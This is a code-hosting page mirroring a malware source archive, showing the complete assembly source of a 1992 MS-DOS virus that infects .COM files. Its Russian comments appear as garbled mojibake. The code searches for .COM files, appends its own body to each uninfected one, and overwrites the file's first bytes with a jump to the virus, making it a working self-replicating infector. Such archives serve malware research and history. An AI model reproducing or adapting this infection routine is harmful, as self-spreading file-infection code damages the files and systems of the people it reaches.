Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Gogi.asm
vxunderground 62ca392943 fix/re-organize
2022-08-21 04:12:28 -05:00

166 lines
4.5 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

; Œ «¥­ìª¨© (¨«¨ ¡®«ì让) ¢¨àãá, § à ¦ î騩 .COM-¯à®£à ¬¬ë
; ¯à¨ § ¯ã᪥, ¥á«¨ ã ­¨å ­¥âã ¢­ ç «¥ JMP.
; <20>஢¥àª¨ ­  ¢á直¥ ¢áïç­®á⨠­¥ ¯à¨áãâáâ¢ãîâ.
;
; Copyright (c) 1992, Gogi&Givi International.
;
.model tiny
.code
org 0100h
start:
jmp virusstart ; <20>¥à¥å®¤ ­  ¢¨àãá:
mov ah,09h ; â ª¦¥, ª ª ¡ã¤¥â
int 21h ; á ¦¥à⢮© ¯à¨
mov ax,4C00h ; § à ¦¥­¨¨
int 21h
Message db 'This is little infection... He-he...',13,10,'$'
; „® á¨å ¯®à ­®à¬ «ì­ë©
; ª®¤ ¦¥àâ¢ë
virusstart: ; € íâ® ¢¨àãá
pushf
push ax ; ‘®å࠭塞 ¢á¥, çâ®
push bx ; ⮫쪮 ¬®¦­®...
push cx
push dx
push ds ; <20>¥ §­ î, ­ áª®«ìª®
push es ; íâ® ¯à ¢¨«ì­®...
push si
call SelfPoint
SelfPoint: ; Ž¯à¥¤¥«ï¥¬ â®çªã
pop si ; ¢å®¤ 
cld ; „¢¨¦¥¬áï ¢¯à ¢®
push cs ; <20>®áâ ¢¨¬ ᥣ¬¥­â­ë¥
pop ds ; ॣ¨áâàë ­ §­ ç¥­¨ï
push cs ; ¨ ®â¯à ¢«¥­¨ï
pop es
mov di,0100h ; ¯à¨¥¬­¨ª¥ - 0100h,
push si ; ­ ç «® ¯à®£à ¬¬ë
add si,original-SelfPoint ; ‘¥©ç á SI 㪠§ë¢ ¥â ­ 
mov cx,3 ; ®à¨£¨­ «ì­ë¥ ¡ ©âë
rep movsb ; ‘ª®¯¨à㥬 ¨å ¢ ­ ç «®
pop si ; § à ¦¥­­®© ¯à®£à ¬¬ë
mov ah,1Ah ; <20>®áâ ¢¨¬ ᮡá⢥­­ãî
mov dx,si ; DTA ¨§ ª®­æ  ¢¨àãá 
add dx,VirusDTA-SelfPoint ; 21h ¯à¥à뢠­¨¥¬
int 21h
mov ah,4Eh ; „¥« ¥¬ FindFirst
mov dx,si ; á ᮮ⢥âáâ¢ãî饩
add dx,FileMask-SelfPoint ; ¬ áª®©
mov cx,32 ; ¨  âਡã⮬ ç⥭¨¥/
int 21h ; § ¯¨áì, çâ®¡ë ­¥
; ¬ã¤à¨âì
jnc RepeatOpen ; Žè¨¡®ª ­¥â - ®âªà뢠¥¬
jmp OutVirus ; <20>¨§ª® ¯®è¥«...
RepeatOpen:
mov ax,3D02h ; Žâªà®¥¬ ä ©«
mov dx,si ; ¯à¨ ¯®¬®é¨ à áè¨à¥­­®£®
add dx,NameF-SelfPoint ; ã¯à ¢«¥­¨ï ®­ë¬
int 21h
jc OutVirus ; <20>ਠ¢á¥å ®è¨¡ª å ¢ë室¨¬
mov bx,ax ; ‚®§ì¬¥¬ ­®¬¥à ä ©« ,
; ¨ ¡ã¤¥¬ ¤¥à¦ âìáï §  BX
mov ah,3Fh ; ‘ç¨â뢠¥¬ ­ áâ®ï騥
mov dx,si ; ª®¬ ­¤ë ¤«ï
add dx,Original-SelfPoint ; ¨á¯®«­¥­¨ï
mov cx,3 ; <20>ãáâì ¡ã¤¥â âਠ¡ ©â 
int 21h
jc OutVirus ; Ž¯ïâì ¯à®¢¥à¨¬ ­  ®è¨¡ªã...
push bx
mov bx,dx
cmp byte ptr [bx],'é' ; ‚¤à㣠¢ í⮬ ä ©«¥
pop bx ; ⮦¥ á­ ç «  ¯¥à¥å®¤?
;
je CloseNotInfect ; ’®£¤  ­¥ § à ¦ âì!
; Žå, «¥­ì ¬­¥ ¯®â®ç­¥¥
; ¯à®¢¥àïâì...
mov ax,4202h ; <20>à룠¥¬ ¢ ª®­¥æ
xor cx,cx ; ¦¥àâ¢ë (¨§­ á¨«®¢ ­¨ï)
xor dx,dx
int 21h ; ’¥¯¥àì ¢ AX «¥¦¨â
jc OutVirus ;  ¤à¥á ­ ç « 
; ¢¨àãá , ¥á«¨ ­¥â,
; ª®­¥ç­®, ®è¨¡ª¨
push ax
mov ah,40h ; ‡ ¯¨è¥¬
mov dx,si ; ⥫® ¢¨àãá 
sub dx,SelfPoint-VirusStart ; ¢ ä ©«-¦¥àâ¢ã
mov cx,VirusEnd-VirusStart ; Š®«¨ç¥á⢮ ¡ ©â
int 21h
pop ax
jc OutVirus ; Œ®¦¥â á«ãç¨âìáï ®è¨¡ª  -
; ¤¨áª, â ¬, ¯¥à¥¯®«­¥­...
sub ax,3 ; ‚ëç¨â ¥¬ 3 - ç⮡ë
push bx ; ¯®¯ áâì Šã¤  <20> ¤®
mov bx,si
sub bx,SelfPoint-VirusStart
mov word ptr cs:[bx+1],ax ; Š« ¤¥¬  ¤à¥á
mov byte ptr [bx],'é' ; Š®¬ ­¤  ¯¥à¥å®¤  (¢
; ¯à¥¤¥« å ᥣ¬¥­â )
pop bx
mov ax,4200h ; € ⥯¥àì ¢ ­ ç «®
xor cx,cx ; ¦¥àâ¢ë
xor dx,dx
int 21h
jc OutVirus ; <20>஢¥àª  ­  ®è¨¡ªã
mov ah,40h ; ˆ § ¯¨è¥¬ â㤠
mov dx,si ; ª®¬ ­¤ã ¯¥à¥å®¤ 
sub dx,SelfPoint-VirusStart ; ­  ­ è¥ £­ãá­®¥
mov cx,3 ; ⥫®
int 21h
jc OutVirus ; Ž¯ïâì ¯à®¢¥à¨¬ ®è¨¡ª¨
mov ah,3Eh ; ” ©« ­ ¤® § ªàëâì
int 21h ; (Ž­ 㦥 § à ¦¥­ -
jmp OutVirus ; ¡®«ìè¥ ­¥ à ¡®â ¥¬)
CloseNotInfect:
mov ah,3Eh ; ‡ ªà뢠¥¬ ­¥¯®¤å®¤ï騩
int 21h ; ä ©«
mov dx,si
add dx,FileMask-SelfPoint ; ˆ ¤¥« ¥¬ FindNext
mov ah,4Fh
int 21h
jc OutVirus ; Žè¨¡ª  - §­ ç¨â, ­¥ áã¤ì¡ 
jmp RepeatOpen ; ˆ«¨ ¯¥à¥å®¤ ­  ®âªàë⨥
OutVirus:
pop si ; ˆ, ª®­¥ç­® ¦¥,
pop es ; ¢á¥ ­  ᢥâ¥
pop ds ; ¢®ááâ ­®¢¨âì
pop dx
pop cx
pop bx
pop ax
popf
mov si,0100h ; ‡ ­®á¨¬ ¢ á⥪  ¤à¥á
push si ; ­ ç «  ¯à®£à ¬¬ë
ret ; ¨ ¤¥« ¥¬ RET
; <20> è¨ ¤ ­­ë¥:
VirusDTA db 30 dup (0) ; <20>â® DTA
NameF db 13 dup (0) ; ’ã⠡㤥⠨¬ï ä ©« 
FileMask db '*.cOm',(0) ; ‚®â â ª ï ªà á¨¢ ï
; ¬ áª 
original:
mov dx,offset Message ; € íâ® ®à¨£¨­ «ì­ë¥ ¡ ©âë
VirusEnd: ; ¨§ ¦¥àâ¢ë (‹®§¨­áª¨©,
; ­¥ §¥¢ ©!)
end start
View Git Blame Copy Permalink